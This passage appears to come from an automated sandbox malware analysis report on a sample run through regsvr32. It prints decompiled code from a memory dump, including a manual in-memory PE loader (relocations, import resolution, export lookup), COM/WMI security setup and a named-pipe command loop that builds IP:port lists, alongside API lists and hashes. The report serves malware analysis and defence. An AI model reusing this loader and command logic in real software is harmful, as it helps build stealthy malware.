                                                                                                                                                                                              • Instruction Fuzzy Hash: AD312970F30117EBDF24AB58D948BEEB77AEF01311F104459ED05E2054E7B0AAA0CB90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 042AE66A
                                                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 042AE672
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 042AE686
                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 042AE701
                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 042AE704
                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 042AE709
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: String$AllocFree
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 344208780-0
                                                                                                                                                                                              • Opcode ID: e0a5969aa289e08e2779a7b94d78837f3902b00fd8fd85b01d2b1af47efbfe0d
                                                                                                                                                                                              • Instruction ID: b0f056c388106304ba4288097e87efc669fd2b8783be2209dc01356ff6df525e
                                                                                                                                                                                              • Opcode Fuzzy Hash: e0a5969aa289e08e2779a7b94d78837f3902b00fd8fd85b01d2b1af47efbfe0d
                                                                                                                                                                                              • Instruction Fuzzy Hash: F8212EB5A10218BFDB00DFA9CC88DAFBBBDEF48754B14445AF505E7240DA71AE01CBA0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 20%
                                                                                                                                                                                              			E042B3D66(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16, intOrPtr _a20) {
                                                                                                                                                                                              				signed int _v5;
                                                                                                                                                                                              				signed short _v12;
                                                                                                                                                                                              				intOrPtr* _v16;
                                                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                                                              				signed int* _v24;
                                                                                                                                                                                              				unsigned int _v28;
                                                                                                                                                                                              				signed short* _v32;
                                                                                                                                                                                              				struct HINSTANCE__* _v36;
                                                                                                                                                                                              				signed int _v40;
                                                                                                                                                                                              				signed int _v44;
                                                                                                                                                                                              				intOrPtr* _v48;
                                                                                                                                                                                              				signed short* _v52;
                                                                                                                                                                                              				intOrPtr _v56;
                                                                                                                                                                                              				unsigned int _v60;
                                                                                                                                                                                              				intOrPtr _v64;
                                                                                                                                                                                              				_Unknown_base(*)()* _v68;
                                                                                                                                                                                              				signed int _v72;
                                                                                                                                                                                              				intOrPtr _v76;
	intOrPtr _v80;
	intOrPtr _v84;
	unsigned int _v88;
	intOrPtr _v92;
	signed int _v96;
	intOrPtr _v100;
	intOrPtr _v104;
	intOrPtr _v108;
	intOrPtr _v112;
	CHAR* _v116;
	signed int _v120;
	intOrPtr _v124;
	signed int _v128;
	signed int _v132;
	signed int _t216;
	signed int _t233;
	void* _t273;
	signed int _t278;
	signed int _t280;
	intOrPtr _t320;

	_v44 = _v44 & 0x00000000;
	_v84 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
	_v20 = _v84;
	_t320 = _a4 -  *((intOrPtr*)(_v20 + 0x34));
	_v64 = _t320;
	if(_t320 == 0) {
		L13:
		while(0 != 0) {
		}
		_push(8);
		if( *((intOrPtr*)(_v20 + 0xbadc25)) == 0) {
			L35:
			if(_a16 == 0) {
				L54:
				_v80 =  *((intOrPtr*)(_v20 + 0x28)) + _a4;
				while(0 != 0) {
				}
				if(_a12 != 0) {
					 *_a12 = _v80;
				}
				 *((intOrPtr*)(_v20 + 0x34)) = _a4;
				_v124 = _v80(_a4, 1, _a8);
				while(0 != 0) {
				}
				if(_v124 != 0) {
					if(_v44 == 0) {
						L77:
						return 1;
					}
					if(_a20 != 1) {
						if(_a20 != 2) {
							L75:
							while(0 != 0) {
							}
							goto L77;
						}
						while(0 != 0) {
						}
						_v132 = _v44;
						goto L75;
					}
					while(0 != 0) {
					}
					_v44();
					goto L75;
				}
				while(0 != 0) {
				}
				return 0;
			}
			while(0 != 0) {
			}
			_push(8);
			if( *((intOrPtr*)(_v20 + 0x78)) == 0) {
				goto L54;
			}
			_v128 = 0x80000000;
			_t216 = 8;
			_v76 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t216 * 0));
			_v108 = _a4 +  *((intOrPtr*)(_v76 + 0x20));
			_v112 = _a4 +  *((intOrPtr*)(_v76 + 0x1c));
			_v104 =  *((intOrPtr*)(_v76 + 0x18));
			while(0 != 0) {
			}
			_v40 = _v40 & 0x00000000;
			while(_v40 < _v104) {
				_v116 = _a4 +  *((intOrPtr*)(_v108 + _v40 * 4));
				_v120 = _a4 +  *((intOrPtr*)(_v112 + _v40 * 4));
				if(lstrcmpA(_v116, _a16) != 0) {
					_v40 = _v40 + 1;
					continue;
				}
				while(0 != 0) {
				}
				_v44 = _v120;
				break;
			}
			if(_v44 != 0) {
				goto L54;
			}
			while(0 != 0) {
			}
			return 0xffffffff;
		}
		_v96 = 0x80000000;
		_t233 = 8;
		_v16 = _a4 +  *((intOrPtr*)(_v20 + (_t233 << 0) + 0x78));
		while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
			_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
			if(_v36 == 0) {
				_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
			}
			if(_v36 != 0) {
				if( *_v16 == 0) {
					_v24 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
				} else {
					_v24 =  *_v16 + _a4;
				}
				_v72 = _v72 & 0x00000000;
				while( *_v24 != 0) {
					if(( *_v24 & _v96) == 0) {
						_v100 =  *_v24 + _a4;
						_v68 = GetProcAddress(_v36, _v100 + 2);
					} else {
						_v68 = GetProcAddress(_v36,  *_v24 & 0x0000ffff);
					}
					if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
						 *_v24 = _v68;
					} else {
						 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v72) = _v68;
					}
					_v24 =  &(_v24[1]);
					_v72 = _v72 + 4;
				}
				_v16 = _v16 + 0x14;
				continue;
			} else {
				_t273 = 0xfffffffd;
				return _t273;
			}
		}
		goto L35;
	}
	_t278 = 8;
	_v52 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t278 * 5));
	_t280 = 8;
	_v56 =  *((intOrPtr*)(_v20 + 0x7c + _t280 * 5));
	while(0 != 0) {
	}
	while(_v56 > 0) {
		_v28 = _v52[2];
		_v56 = _v56 - _v28;
		_v28 = _v28 - 8;
		_v28 = _v28 >> 1;
		_v32 =  &(_v52[4]);
		_v92 = _a4 +  *_v52;
		_v60 = _v28;
		while(1) {
			_v88 = _v60;
			_v60 = _v60 - 1;
			if(_v88 == 0) {
				break;
			}
			_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
			_v12 =  *_v32 & 0xfff;
			_v48 = (_v12 & 0x0000ffff) + _v92;
			if((_v5 & 0x000000ff) != 3) {
				if((_v5 & 0x000000ff) == 0xa) {
					 *_v48 =  *_v48 + _v64;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							 *_v48 =  *_v48 + _v64;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_v32 =  &(_v32[1]);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_v52 = _v32;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				goto L13;
                                                                                                                                                                                              			}

                                                                                                                                                                                              0x042b3e6b
                                                                                                                                                                                              0x042b3e6b
                                                                                                                                                                                              0x042b3e48
                                                                                                                                                                                              0x042b3e53
                                                                                                                                                                                              0x042b3e53
                                                                                                                                                                                              0x042b3e72
                                                                                                                                                                                              0x042b3e72
                                                                                                                                                                                              0x042b3e7a
                                                                                                                                                                                              0x042b3e7a
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000), ref: 042B3ECD
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00000000), ref: 042B3EE6
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 042B3F42
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 042B3F61
                                                                                                                                                                                              • lstrcmpA.KERNEL32(?,00000000), ref: 042B4052
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc$HandleLibraryLoadModulelstrcmp
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1872726118-0
                                                                                                                                                                                              • Opcode ID: b2395d976dd3d458be21c9d586503e162e690842e604e8cd1c26c0be6e9d1739
                                                                                                                                                                                              • Instruction ID: 702a7facbd967b7f3ecbaf8ba97c88e9222188fa3eb9af8fc77409fd092c773b
                                                                                                                                                                                              • Opcode Fuzzy Hash: b2395d976dd3d458be21c9d586503e162e690842e604e8cd1c26c0be6e9d1739
                                                                                                                                                                                              • Instruction Fuzzy Hash: 90E19174A2020ADFCB14DF98C984AEDBBB1FF08354F14855AE855EB352D774A981CB90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: @$\u%04X$\u%04X\u%04X
                                                                                                                                                                                              • API String ID: 0-2132903582
                                                                                                                                                                                              • Opcode ID: 3725193fa63959a090cfd881e706ecb65941fe5a1622135111904f0ed6f58a07
                                                                                                                                                                                              • Instruction ID: 8503e2184c25dae0ddc05468861238da32e5a454b379d6cb673bae1d637341ef
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3725193fa63959a090cfd881e706ecb65941fe5a1622135111904f0ed6f58a07
                                                                                                                                                                                              • Instruction Fuzzy Hash: B741A271730106A7EB284EA89DB9BFA3A58DF013D4F180115FAD2E7240F261F9B0D6D1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 30%
                                                                                                                                                                                              			E042AE400(void* __ecx) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				void* _v12;
                                                                                                                                                                                              				char* _t15;
                                                                                                                                                                                              				intOrPtr* _t16;
                                                                                                                                                                                              				void* _t21;
                                                                                                                                                                                              				intOrPtr* _t23;
                                                                                                                                                                                              				intOrPtr* _t24;
                                                                                                                                                                                              				intOrPtr* _t25;
                                                                                                                                                                                              				void* _t30;
                                                                                                                                                                                              				void* _t33;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v12 = 0;
                                                                                                                                                                                              				_v8 = 0;
                                                                                                                                                                                              				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
                                                                                                                                                                                              				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
                                                                                                                                                                                              				_t15 =  &_v12;
                                                                                                                                                                                              				__imp__CoCreateInstance(0x42bc868, 0, 1, 0x42bc878, _t15);
                                                                                                                                                                                              				if(_t15 < 0) {
                                                                                                                                                                                              					L5:
                                                                                                                                                                                              					_t23 = _v8;
                                                                                                                                                                                              					if(_t23 != 0) {
                                                                                                                                                                                              						 *((intOrPtr*)( *_t23 + 8))(_t23);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t24 = _v12;
                                                                                                                                                                                              					if(_t24 != 0) {
                                                                                                                                                                                              						 *((intOrPtr*)( *_t24 + 8))(_t24);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t16 = 0;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					__imp__#2(__ecx);
                                                                                                                                                                                              					_t25 = _v12;
                                                                                                                                                                                              					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
                                                                                                                                                                                              					if(_t21 < 0) {
                                                                                                                                                                                              						goto L5;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
                                                                                                                                                                                              						if(_t21 < 0) {
                                                                                                                                                                                              							goto L5;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							_t16 = E042A8BDE(8);
                                                                                                                                                                                              							if(_t16 == 0) {
                                                                                                                                                                                              								goto L5;
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								 *((intOrPtr*)(_t16 + 4)) = _v12;
                                                                                                                                                                                              								 *_t16 = _v8;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t16;
                                                                                                                                                                                              			}














                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,042AE731,000009DA,00000000,?,00000000), ref: 042AE413
                                                                                                                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,042AE731,000009DA,00000000,?,00000000), ref: 042AE424
                                                                                                                                                                                              • CoCreateInstance.OLE32(042BC868,00000000,00000001,042BC878,?,?,042AE731,000009DA,00000000,?,00000000), ref: 042AE43B
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 042AE446
                                                                                                                                                                                              • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,042AE731,000009DA,00000000,?,00000000), ref: 042AE471
                                                                                                                                                                                                • Part of subcall function 042A8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,042A959D,00000100,?,042A6507), ref: 042A8BEC
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1610782348-0
                                                                                                                                                                                              • Opcode ID: f08e21ea886c00c904f988ab642501821b33211c2169a52e52b7ee400fe0f3e5
                                                                                                                                                                                              • Instruction ID: d6e699df033ee91c53e940d10e5108715dd908f942715c57753371dbcb7817d9
                                                                                                                                                                                              • Opcode Fuzzy Hash: f08e21ea886c00c904f988ab642501821b33211c2169a52e52b7ee400fe0f3e5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 32216A70760245BBDB248B67DC4CE5BBF7CEFC2B15F01405CBA01A7290D670AA41DA70
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 83%
                                                                                                                                                                                              			E042B3379(void* __edi, char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
                                                                                                                                                                                              				signed int _t12;
                                                                                                                                                                                              				signed int _t13;
                                                                                                                                                                                              				signed int _t23;
                                                                                                                                                                                              				void* _t30;
                                                                                                                                                                                              				char* _t31;
                                                                                                                                                                                              				char* _t33;
                                                                                                                                                                                              				char* _t35;
                                                                                                                                                                                              				char* _t37;
                                                                                                                                                                                              				char* _t38;
                                                                                                                                                                                              				long long* _t40;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t30 = __edi;
                                                                                                                                                                                              				_t12 = _a20;
                                                                                                                                                                                              				if(_t12 == 0) {
                                                                                                                                                                                              					_t12 = 0x11;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t35 = _a4;
                                                                                                                                                                                              				_push(_t25);
                                                                                                                                                                                              				 *_t40 = _a12;
                                                                                                                                                                                              				_push(_t12);
                                                                                                                                                                                              				_push("%.*g");
                                                                                                                                                                                              				_push(_a8);
                                                                                                                                                                                              				_push(_t35);
                                                                                                                                                                                              				L042B34D2();
                                                                                                                                                                                              				_t23 = _t12;
                                                                                                                                                                                              				if(_t23 < 0 || _t23 >= _a8) {
                                                                                                                                                                                              					L16:
                                                                                                                                                                                              					_t13 = _t12 | 0xffffffff;
                                                                                                                                                                                              					goto L17;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					E042B3352(_t12, _t35);
                                                                                                                                                                                              					if(strchr(_t35, 0x2e) != 0 || strchr(_t35, 0x65) != 0) {
                                                                                                                                                                                              						L8:
                                                                                                                                                                                              						_push(_t30);
                                                                                                                                                                                              						_t37 = strchr(_t35, 0x65);
                                                                                                                                                                                              						_t31 = _t37;
                                                                                                                                                                                              						if(_t37 == 0) {
                                                                                                                                                                                              							L15:
                                                                                                                                                                                              							_t13 = _t23;
                                                                                                                                                                                              							L17:
                                                                                                                                                                                              							return _t13;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t38 = _t37 + 1;
                                                                                                                                                                                              						_t33 = _t31 + 2;
                                                                                                                                                                                              						if( *_t38 == 0x2d) {
                                                                                                                                                                                              							_t38 = _t33;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						while( *_t33 == 0x30) {
                                                                                                                                                                                              							_t33 = _t33 + 1;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						if(_t33 != _t38) {
                                                                                                                                                                                              							E042A8CE0(_t38, _t33, _t23 - _t33 + _a4);
                                                                                                                                                                                              							_t23 = _t23 + _t38 - _t33;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						goto L15;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t6 = _t23 + 3; // 0x42b1b64
                                                                                                                                                                                              						_t12 = _t6;
                                                                                                                                                                                              						if(_t12 >= _a8) {
                                                                                                                                                                                              							goto L16;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t35[_t23] = 0x302e;
                                                                                                                                                                                              						( &(_t35[2]))[_t23] = 0;
                                                                                                                                                                                              						_t23 = _t23 + 2;
                                                                                                                                                                                              						goto L8;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}














                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: strchr$_snprintf
                                                                                                                                                                                              • String ID: %.*g
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 64%
                                                                                                                                                                                              			E042A377F(void* __fp0) {
                                                                                                                                                                                              				signed int _v144;
                                                                                                                                                                                              				signed int _v152;
                                                                                                                                                                                              				char _v160;
                                                                                                                                                                                              				char _v164;
                                                                                                                                                                                              				char _v168;
                                                                                                                                                                                              				signed int _v172;
                                                                                                                                                                                              				char _v176;
                                                                                                                                                                                              				intOrPtr _v180;
                                                                                                                                                                                              				signed int _v184;
                                                                                                                                                                                              				signed int _v188;
                                                                                                                                                                                              				signed int _v192;
                                                                                                                                                                                              				signed int _v196;
                                                                                                                                                                                              				char _v200;
                                                                                                                                                                                              				signed int _v204;
                                                                                                                                                                                              				intOrPtr _t72;
                                                                                                                                                                                              				intOrPtr _t75;
                                                                                                                                                                                              				signed int _t80;
                                                                                                                                                                                              				signed int _t81;
                                                                                                                                                                                              				signed int _t84;
                                                                                                                                                                                              				signed int _t87;
                                                                                                                                                                                              				signed int _t88;
                                                                                                                                                                                              				signed int _t100;
                                                                                                                                                                                              				void* _t102;
                                                                                                                                                                                              				void* _t103;
                                                                                                                                                                                              				unsigned int* _t104;
                                                                                                                                                                                              				signed int _t110;
                                                                                                                                                                                              				signed int _t113;
                                                                                                                                                                                              				void* _t118;
                                                                                                                                                                                              				intOrPtr _t124;
                                                                                                                                                                                              				signed int _t127;
                                                                                                                                                                                              				intOrPtr _t129;
                                                                                                                                                                                              				intOrPtr _t132;
                                                                                                                                                                                              				void* _t133;
                                                                                                                                                                                              				void* _t137;
                                                                                                                                                                                              				signed int _t146;
                                                                                                                                                                                              				signed int _t148;
                                                                                                                                                                                              				signed short* _t149;
                                                                                                                                                                                              				signed int _t159;
                                                                                                                                                                                              				intOrPtr* _t183;
                                                                                                                                                                                              				void* _t187;
                                                                                                                                                                                              				void* _t188;
                                                                                                                                                                                              				void* _t189;
                                                                                                                                                                                              				signed short* _t192;
                                                                                                                                                                                              				void* _t196;
                                                                                                                                                                                              				signed int _t199;
                                                                                                                                                                                              				signed int _t200;
                                                                                                                                                                                              				signed int _t203;
                                                                                                                                                                                              				signed int _t204;
                                                                                                                                                                                              				char _t205;
                                                                                                                                                                                              				signed int _t206;
                                                                                                                                                                                              				void* _t208;
                                                                                                                                                                                              				void* _t214;
                                                                                                                                                                                              				void* _t221;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t221 = __fp0;
                                                                                                                                                                                              				_t208 = (_t206 & 0xfffffff8) - 0xac;
                                                                                                                                                                                              				_v144 = 0;
                                                                                                                                                                                              				_v172 = 0;
                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                              					_t72 =  *0x42bf818; // 0x48ef8b0
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push( *0x42bf804);
                                                                                                                                                                                              					_v152 = 0;
                                                                                                                                                                                              					if( *((intOrPtr*)(_t72 + 0xe0))() == 0 && GetLastError() != 0x217) {
                                                                                                                                                                                              						break;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push( &_v160);
                                                                                                                                                                                              					_t75 =  *0x42bf818; // 0x48ef8b0
                                                                                                                                                                                              					_push(0x80000);
                                                                                                                                                                                              					_push( *0x42bf8bc);
                                                                                                                                                                                              					_push( *0x42bf804);
                                                                                                                                                                                              					if( *((intOrPtr*)(_t75 + 0x90))() == 0 || _v180 == 0) {
                                                                                                                                                                                              						GetLastError();
                                                                                                                                                                                              						goto L56;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t149 =  *0x42bf8bc; // 0x0
                                                                                                                                                                                              						_t80 =  *_t149 & 0x0000ffff;
                                                                                                                                                                                              						_t214 = _t80 - 8;
                                                                                                                                                                                              						if(_t214 > 0) {
                                                                                                                                                                                              							_t81 = _t80 - 9;
                                                                                                                                                                                              							__eflags = _t81;
                                                                                                                                                                                              							if(_t81 == 0) {
                                                                                                                                                                                              								E042B0962( &_v200);
                                                                                                                                                                                              								L12:
                                                                                                                                                                                              								_t84 =  &_v200;
                                                                                                                                                                                              								L13:
                                                                                                                                                                                              								_push(4);
                                                                                                                                                                                              								L14:
                                                                                                                                                                                              								_push(_t84);
                                                                                                                                                                                              								_push(5);
                                                                                                                                                                                              								L31:
                                                                                                                                                                                              								_pop(_t187);
                                                                                                                                                                                              								E042AD1A6(_t187);
                                                                                                                                                                                              								L32:
                                                                                                                                                                                              								L56:
                                                                                                                                                                                              								DisconnectNamedPipe( *0x42bf804);
                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                              								_pop(0);
                                                                                                                                                                                              								if(_v172 == 0) {
                                                                                                                                                                                              									continue;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								break;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t87 = _t81;
                                                                                                                                                                                              							__eflags = _t87;
                                                                                                                                                                                              							if(_t87 == 0) {
                                                                                                                                                                                              								_v204 = 0;
                                                                                                                                                                                              								_t88 = E042A171A( &_v204, _t221);
                                                                                                                                                                                              								_v188 = _t88;
                                                                                                                                                                                              								__eflags = _t88;
                                                                                                                                                                                              								if(_t88 == 0) {
                                                                                                                                                                                              									_push(4);
                                                                                                                                                                                              									_v192 = 0;
                                                                                                                                                                                              									_push( &_v192);
                                                                                                                                                                                              									L19:
                                                                                                                                                                                              									_push(0xa);
                                                                                                                                                                                              									goto L31;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t146 = _v204;
                                                                                                                                                                                              								_t90 = _t146 * 0x16;
                                                                                                                                                                                              								_v184 = _t146 * 0x16;
                                                                                                                                                                                              								_t203 = E042A8BDE(_t90);
                                                                                                                                                                                              								_v192 = _t203;
                                                                                                                                                                                              								__eflags = _t203;
                                                                                                                                                                                              								if(_t203 == 0) {
                                                                                                                                                                                              									_t64 =  &_v192;
                                                                                                                                                                                              									 *_t64 = _v192 & 0x00000000;
                                                                                                                                                                                              									__eflags =  *_t64;
                                                                                                                                                                                              									_push(4);
                                                                                                                                                                                              									_push( &_v192);
                                                                                                                                                                                              									_t188 = 0xa;
                                                                                                                                                                                              									E042AD1A6(_t188);
                                                                                                                                                                                              									L52:
                                                                                                                                                                                              									E042A8BF4( &_v188, _t146);
                                                                                                                                                                                              									goto L32;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t199 = 0;
                                                                                                                                                                                              								__eflags = _t146;
                                                                                                                                                                                              								if(_t146 == 0) {
                                                                                                                                                                                              									L50:
                                                                                                                                                                                              									_push(E042AA43D(_t203));
                                                                                                                                                                                              									_push(_t203);
                                                                                                                                                                                              									_t189 = 5;
                                                                                                                                                                                              									E042AD1A6(_t189);
                                                                                                                                                                                              									E042A8BF4( &_v192, 0xffffffff);
                                                                                                                                                                                              									_t208 = _t208 + 0x10;
                                                                                                                                                                                              									goto L52;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t159 = _v188 + 4;
                                                                                                                                                                                              								__eflags = _t159;
                                                                                                                                                                                              								_v204 = _t159;
                                                                                                                                                                                              								do {
                                                                                                                                                                                              									__eflags = _t199;
                                                                                                                                                                                              									if(_t199 != 0) {
                                                                                                                                                                                              										__eflags = _t199 - _t146 - 1;
                                                                                                                                                                                              										if(_t199 < _t146 - 1) {
                                                                                                                                                                                              											_t102 = E042AA43D(_t203);
                                                                                                                                                                                              											_t159 = _v204;
                                                                                                                                                                                              											 *((short*)(_t102 + _t203)) = 0x3b;
                                                                                                                                                                                              										}
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t100 =  *_t159;
                                                                                                                                                                                              									_v196 = _t100;
                                                                                                                                                                                              									__eflags = _t100;
                                                                                                                                                                                              									if(_t100 != 0) {
                                                                                                                                                                                              										_t103 = E042AA43D(_t203);
                                                                                                                                                                                              										_t104 = _v204;
                                                                                                                                                                                              										_push(_t104[1] & 0x0000ffff);
                                                                                                                                                                                              										_push( *_t104 >> 0x18);
                                                                                                                                                                                              										_push(_t104[0] & 0x000000ff);
                                                                                                                                                                                              										_push(_t104[0] & 0x000000ff);
                                                                                                                                                                                              										_t110 = E042AA43D(_t203) + _t203;
                                                                                                                                                                                              										__eflags = _t110;
                                                                                                                                                                                              										E042A9E12(_t110, _v184 - _t103, "%u.%u.%u.%u:%u", _v196 & 0x000000ff);
                                                                                                                                                                                              										_t159 = _v204;
                                                                                                                                                                                              										_t208 = _t208 + 0x20;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t199 = _t199 + 1;
                                                                                                                                                                                              									_t159 = _t159 + 0x20;
                                                                                                                                                                                              									_v204 = _t159;
                                                                                                                                                                                              									__eflags = _t199 - _t146;
                                                                                                                                                                                              								} while (_t199 < _t146);
                                                                                                                                                                                              								goto L50;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							__eflags = _t87 != 1;
                                                                                                                                                                                              							if(_t87 != 1) {
                                                                                                                                                                                              								goto L56;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_v204 = 0;
                                                                                                                                                                                              							_t113 = E042A171A( &_v204, _t221);
                                                                                                                                                                                              							_t204 = _v204;
                                                                                                                                                                                              							_v196 = _t113;
                                                                                                                                                                                              							__eflags = _t113;
                                                                                                                                                                                              							if(_t113 != 0) {
                                                                                                                                                                                              								E042A8BF4( &_v196, _t204);
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_v204 = _t204 * 0x16;
                                                                                                                                                                                              							_t84 =  &_v204;
                                                                                                                                                                                              							goto L13;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						if(_t214 == 0) {
                                                                                                                                                                                              							_t84 = E042B0962( &_v200);
                                                                                                                                                                                              							L16:
                                                                                                                                                                                              							__eflags = _t84;
                                                                                                                                                                                              							if(_t84 == 0) {
                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                              								goto L19;
                                                                                                                                                                                              							}
